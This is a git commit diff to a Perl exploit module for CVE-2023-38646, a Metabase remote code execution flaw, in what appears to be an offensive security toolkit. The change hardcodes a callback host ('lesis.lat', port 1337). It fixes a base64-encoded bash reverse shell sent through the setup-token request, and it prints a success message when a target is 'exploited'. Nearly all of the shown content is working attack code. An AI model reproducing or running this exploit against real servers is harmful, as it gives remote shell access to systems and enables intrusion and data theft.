fix reverse shell payload

htrgouvea · Oct 25, 2024 · 7b4fb8f · 7b4fb8f
1 parent efa8437
commit 7b4fb8f
Showing 1 changed file with 6 additions and 3 deletions.
diff --git a/lib/Spellbook/Advisory/CVE_2023_38646.pm b/lib/Spellbook/Advisory/CVE_2023_38646.pm
@@ -9,7 +9,10 @@ package Spellbook::Advisory::CVE_2023_38646 {
 
     sub new {
         my ($self, $parameters) = @_;
-        my ($help, $target, $remote, $port, @result);
+        my ($help, $target, @result);
+
+        my $remote = 'lesis.lat';
+        my $port   = 1337;
 
         Getopt::Long::GetOptionsFromArray (
             $parameters,
@@ -34,7 +37,7 @@ package Spellbook::Advisory::CVE_2023_38646 {
 
                     if ($token) {
                         my $headers = HTTP::Headers -> new ("Content-Type" => "application/json");
-                        my $reverse = encode_base64("bash -i >&/dev/tcp/$remote/$port 0>&1", "");
+                        my $reverse = encode_base64("bash -i >& /dev/tcp/$remote/$port 0>&1", "");
 
                         my $payload = qq({
                             "token": "$token",
@@ -60,7 +63,7 @@ package Spellbook::Advisory::CVE_2023_38646 {
                         my $response = $userAgent -> request($request);
 
                         if ($response -> code() == 400) {
-                            push @result, $target;
+                            push @result, "\n[+] $target exploited\n";
                         }
                     }
                 }